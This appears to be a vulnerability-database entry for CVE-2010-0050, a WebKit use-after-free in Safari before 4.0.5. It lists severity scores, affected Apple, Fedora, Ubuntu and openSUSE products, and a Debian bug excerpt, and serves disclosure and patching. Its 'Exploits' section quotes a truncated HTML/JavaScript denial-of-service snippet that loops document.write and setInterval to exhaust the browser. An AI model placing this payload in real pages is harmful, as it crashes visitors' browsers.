935
VMScore

CVE-2010-0050

Published: 15/03/2010 Updated: 03/02/2024
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Use-after-free vulnerability in WebKit in Apple Safari prior to 4.0.5 allows remote malicious users to execute arbitrary code or cause a denial of service (application crash) via an HTML document with improperly nested tags.

Vulnerable Product Search on Vulmon Subscribe to Product

apple safari

apple iphone os

fedoraproject fedora 11

fedoraproject fedora 13

fedoraproject fedora 12

canonical ubuntu linux 10.10

canonical ubuntu linux 9.10

canonical ubuntu linux 10.04

opensuse opensuse 11.2

opensuse opensuse 11.3

Vendor Advisories

Debian Bug report logs - #574064 webkit: CVE-2010-0046 through CVE-2010-0054 (multiple vulnerabilities) Package: src:webkit; Maintainer for src:webkit is (unknown); Reported by: Michael Gilbert <michaelsgilbert@gmailcom> Date: Tue, 16 Mar 2010 02:30:01 UTC Severity: grave Tags: security Found in version webkit/101-4 ...

Exploits

<html> <script> loop1(); var a = "<blink>"; function loop1() { documentwrite(a); setInterval(loop2,0); } function loop2() { documentwrite(a); setInterval(loop1,0); } </script> <body> Webkit (Safari) Stack Exhaustion DoS Found By: Dr_IDE Credit To: Mattias Karlsson Reference: wwwexploit-dbcom/explo ...